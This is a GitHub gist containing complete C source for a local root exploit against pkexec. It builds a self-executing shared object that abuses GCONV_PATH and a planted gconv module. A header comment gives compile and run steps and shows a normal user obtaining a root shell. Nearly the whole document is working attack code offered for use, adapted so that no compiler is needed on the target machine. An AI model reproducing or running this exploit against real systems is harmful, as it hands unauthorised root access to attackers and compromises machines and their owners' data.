Skip to content

Instantly share code, notes, and snippets.

@darrenmartyn
Created January 26, 2022 08:55
Show Gist options
  • Save darrenmartyn/c0902e3b7f01646a3d1de4ced9eb9e00 to your computer and use it in GitHub Desktop.
Save darrenmartyn/c0902e3b7f01646a3d1de4ced9eb9e00 to your computer and use it in GitHub Desktop.
/*
* For original see haxx.in/files/blasty-vs-pkexec.c
*
* this version is just using some awful hack to
* avoid having to call gcc on the target box.
* this versions fragile - must be named payload.so
* might add better detection later, whatever.
* all credit to bl4sty for the actual exploit,
* I just made some changes for my usecase.
* you will have to change the interp for diff
* architectures, I'm sure you can work it out.
* - dmartyn
* $ gcc -o payload.so -fPIC -shared hax.c -lc -ldl -Wl,-e,lol
* $ whoami
* user
* $ ./payload.so
* [~] maybe get shell now?
* # whoami
* root
* #
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
const char my_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2";
void fatal(char *f) {
perror(f);
exit(-1);
}
void gconv() {
return;
}
void gconv_init() {
setuid(0); seteuid(0); setgid(0); setegid(0);
static char *a_argv[] = { "sh", NULL };
static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
execve("/bin/sh", a_argv, a_envp);
exit(0);
}
int lol(int argc, char *argv[]) {
struct stat st;
char *a_argv[]={ NULL };
char *a_envp[]={
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
NULL
};
if (stat("GCONV_PATH=.", &st) < 0) {
if(mkdir("GCONV_PATH=.", 0777) < 0) {
fatal("mkdir");
}
int fd = open("GCONV_PATH=./lol", O_CREAT|O_RDWR, 0777);
if (fd < 0) {
fatal("open");
}
close(fd);
}
if (stat("lol", &st) < 0) {
if(mkdir("lol", 0777) < 0) {
fatal("mkdir");
}
FILE *fp = fopen("lol/gconv-modules", "wb");
if(fp == NULL) {
fatal("fopen");
}
fprintf(fp, "module UTF-8// INTERNAL ../payload 2\n");
fclose(fp);
}
printf("[~] maybe get shell now?\n");
execve("/usr/bin/pkexec", a_argv, a_envp);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment